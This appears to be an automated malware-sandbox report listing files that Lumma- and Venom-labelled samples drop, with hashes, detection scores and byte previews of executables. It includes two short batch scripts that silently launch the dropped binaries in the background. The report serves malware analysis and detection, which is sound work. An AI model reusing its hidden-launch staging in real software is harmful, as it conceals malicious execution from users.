Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vm.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	942
Entropy (8bit):	5.350509596383769
Encrypted:	false
SSDEEP:	24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKnYHKh3oPtHo6hAHKzeR
MD5:	B6D3844EAA406C781DC083A57D80B31D
SHA1:	A86C11005B4765CF80CE96F09686B601DD3F87D7
SHA-256:	FC52CE6F1AE1858EFB752C50FD39D3FD82CC2605B95E94B9C16FB9220BC25D20
SHA-512:	08CD3FFA613D2A95564DFEBBE5C9CFB3CA7B903BAF0F1105AECB039420C9126B06A1CA6D7DA562F18DB1C28B4877D84C98AE74C7AB4799DE8B8C5381F4390462
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\Microsoft.Explorer.Notification.{1A9F1A36-3C09-FABC-074C-A7C43D9E3759}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	404
Entropy (8bit):	7.237769240723788
Encrypted:	false
SSDEEP:	12:6v/78/vlRYiss4zKRkj051UImYiyx5NDqxa5U6:16/KSI/mODN+xh6
MD5:	3905593FDAF39CF1418D923565E08345
SHA1:	20B73D80CADF71956847FFBE0E264811D03680EE
SHA-256:	156521BB822C49F02192EFB0062095AC0710A36E02F50D72F26AAD6C50F27479
SHA-512:	6EF1E8F393AC0FD89D58E29F44602E21AD3829F47CE9FE43C9E8F9F2F14FCEBAC3A2F04DE8671767F57922C0144FBDEE812548DC6DB25CBC800271AD25D9102D
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a....>IDAT8O.?K.A..g.lDlUr`c#.$...m.S.(...6..E..+...H@..pIk."....k.Bo\|sY<m...?nwf...]...1....\..x..!.YFT..'&..Q.u.5...=.u..NY...+s.u-.p.q..C..y..s...+$.E...i..N......%vO.?...BZ%v:}..;X.Y..Vx.....o.........aoj6..../P7u5.L.-.2..x..s.E?B...1=.o.7.K..;...sd......vl......5..}L.4..^.......&...+.s.....6..j....;..huC-.<....IEND.B`.

C:\Users\user\AppData\Local\Temp\2FBE.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	7.331838963074561
Encrypted:	false
SSDEEP:	24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
MD5:	2B3ECC21382E825D6FE0812A717717EB
SHA1:	F3386531F7726A4F673003BF6CB5806843B76FFB
SHA-256:	AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
SHA-512:	7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 7Y18r(14).exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\34CA.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	11672576
Entropy (8bit):	6.48028581980635
Encrypted:	false
SSDEEP:	98304:LzqI+neqpiuNs3zHlse+SRWSlwEO5zwnJY:N5uNs3zF5+SNJOk
MD5:	D3785ED170CDB1F4784D3DFF3A61DAE0
SHA1:	4BB2D65976DB66FC918C354AA4B2D1162B2420BA
SHA-256:	505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
SHA-512:	3D5C970C602F31E873E655EAB73DAEE3823717E10CF0D660FF59F333F735E3F0C6B13ED15875C10BB39876CC24E48CC73937382F40C9A364BD0DB7745BFF29DD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\34CA.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 7Y18r(14).exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.,I....................@.....................................4....`... ......................................P..N....`..X.......W...................`.............................. ...(....................d..X............................text....+I......,I.................`.``.data........@I......0I.............@.`..rdata..P.X...T...X...S.............@.`@.pdata............................@.0@.xdata..P...........................@.0@.bss.....~...........................`..edata..N....P......................@.0@.idata..X....`......................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...W...........................@.0..reloc.......`.......t..............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\BD9E.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	141944
Entropy (8bit):	5.653169478479977
Encrypted:	false
SSDEEP:	1536:0OrbHDFbGsQ/Q/WGX5Nqzaiz1agCDP2zJ43MOkCYZZ2vWFx6qKZ:9rLDFbGYHiYbP2qkf2Kx6N
MD5:	B6A1C0998D0A7979C9EC17B8D5CF8A81
SHA1:	32154E9BDCD0975A4095A88B68834E2DA21412DD
SHA-256:	4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
SHA-512:	80EA862F84FC9FBF67607D31177161D908F12FA720C0984AD20BDB9E33C215E781BE3C20B7AB327476966F4E224A993E557975536A229EC8B1F5DD531613A980
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.........."...0..4............... .....@..... .......................@............`...@......@............... ...............................`..................x&........................................................................... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H...........h...........(G...............................................0..).............(.....o.......-..................J.(.....(....}.....0..I........{......~....~....o....,.r...ps....z.{......~....~....o....,.r=..ps....z..{....o....,.rs..ps....z..}.......0..C........{.......o....,%r...p.....(..........(....(....s....z..s.....(.....s....t......0..T....... ..75 ?h.. .... .... ..... .....O .... .... ....s.........(....(...+o....s.........V.(......}......}....*...0..........

C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	338427
Entropy (8bit):	7.999421481430211
Encrypted:	true
SSDEEP:	6144:NGuYnZvCloK9BLa2VS1T6dH5IxUt/eiFLj//4RLu7HuayKy8R5spw0:EuYhClokzVjdyx6Tj/gRsHpyKy8wS0
MD5:	CCC6A76DAC238257CF8CFFE352B3E5C4
SHA1:	B2705A5A08E1FAA0E4D3097F79EA9FD09C8189FA
SHA-256:	3C2768836296463361FFBC8F105F713B1059EA6F22C3272FFB9C77D41CA86024
SHA-512:	611628A9D2F81012A04F6B5E8A43C111ACF7DB1FED3042A4609A7FC8F6591775E013580A73F621B96F81D8B3C831F0698D7070451B6332E3076041C04097F42A
Malicious:	false
Preview:	`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^.....?...:gd.u.Z..6....oI..!.9...m.\|.0..7.oR..

C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	398336
Entropy (8bit):	5.845773382535582
Encrypted:	false
SSDEEP:	6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
MD5:	640C7C7EFAE54CC8DB95B07151C1E70D
SHA1:	F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
SHA-256:	E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
SHA-512:	694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40376
Entropy (8bit):	5.902054884820747
Encrypted:	false
SSDEEP:	768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
MD5:	F1B14F71252DE9AC763DBFBFBFC8C2DC
SHA1:	DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
SHA-256:	796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
SHA-512:	636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................\|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.476456017363834
Encrypted:	false
SSDEEP:	3:mKDDFRKnwdJI0CHhSnu/:hGwdxCHYno
MD5:	119839A00B05FCD9AED401736B817ACF
SHA1:	07F23D288EC1E8DE71F7D262D00172D419725EE2
SHA-256:	340034255D14BA5EE3E9F794064D81B675E2ACA6452D86F461583577C051EAF4
SHA-512:	545C68B5BB9B8249D8FEDA76792D9279AEE0482E26C261B9F2A5FE97D3496D208A6DB31BE3536D947CE1AF895AEA65365E9935738268129C8A6AC5FD3CC5CBD2
Malicious:	false
Preview:	@echo off..start "" /b "lm.exe" >nul 2>&1..exit..

C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	106495
Entropy (8bit):	7.9980244323728495
Encrypted:	true
SSDEEP:	3072:8cK8hPo9OmXlpd2zSAaSJAMCjOnjTaGcAXb87:8toOhl2mAaSOFIT6AXw7
MD5:	3D5A228A61FC2FBFAFB6D63A6F6C77A7
SHA1:	D76DDCBB0EEF778F5C72B628A5696B8F67EDD32C
SHA-256:	1D6C79DFFF9E47928457C86CDEFAEAAB185B3476FD3F568AD668252CD53F8877
SHA-512:	1B04BCA4C65377B406E04A8267CAB9B5D853B5E339A3B2AEC6ECEB70A8C3A64CBA5DE390193F9CC0DD26A7B57A0C520622DAE9DFAF2EB3202C7EAA3D48DA5CD5
Malicious:	false
Preview:	`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P.K....Q3.QJ>YZ.....*Hz..T.IX.t.+2.eO.$.8R

C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	398336
Entropy (8bit):	5.845773382535582
Encrypted:	false
SSDEEP:	6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
MD5:	640C7C7EFAE54CC8DB95B07151C1E70D
SHA1:	F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
SHA-256:	E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
SHA-512:	694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.517272343894447
Encrypted:	false
SSDEEP:	3:mKDDFRKnwdTCHhSnu/:hGwdWHYno
MD5:	1AB4DC21DCB24F5B7345CE5C0B794B82
SHA1:	18F722AD31EE9D81181F8CA2CEF60A70B03BB030
SHA-256:	AC2103023D146E62C3B708384AE0ED044D17258901272068EF93C15C9F5AA06E
SHA-512:	83F1D566B8F5B7875811762433CF7C2722225C789A3B917B2C4184A442D9D6AF9C6FE703CE354D223824CFE8ED86E6E7780EC02008C093298FBCD3C08840DBDD
Malicious:	true
Preview:	@echo off..start "" /b "vm.exe" >nul 2>&1..exit..

C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40376
Entropy (8bit):	5.902054884820747
Encrypted:	false
SSDEEP:	768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
MD5:	F1B14F71252DE9AC763DBFBFBFC8C2DC
SHA1:	DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
SHA-256:	796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
SHA-512:	636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................\|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2q1enli.aly.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ds40pw40.fgb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvnk2koo.3zc.psm1

Download File

Process:	C:\Users\user\AppData\Local\Temp\BD9E.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pk1a0vey.sg1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q205syu0.b5t.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\BD9E.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvgemafc.zot.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\lumma.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	528925
Entropy (8bit):	7.999322324722934
Encrypted:	true
SSDEEP:	12288:xyY9C/+kpVD3KhE7vLg5C9pyKy8/i4wDW9Ns8PDjxQ1x8MjR6DngMl:xhs/+oksg5CTyYa4wa9JJbus
MD5:	C326FE916E749D691CAEDBC7851F984C
SHA1:	ABF574E081288F7FC0D270A4ABD79372C7DAA3F2
SHA-256:	6E6199329BB1C1989E8D5266A5F57119E4454A4716DC5A1D16638D4BE645C1F0
SHA-512:	EF8899ADEB8396EF207243711038217BD50E1800C6BAA2D70C869A11BDA1F21D04D1C8CBC381111BF9311385116F6A27AD1DFF3A8E72D278079FBCDB46440293
Malicious:	false
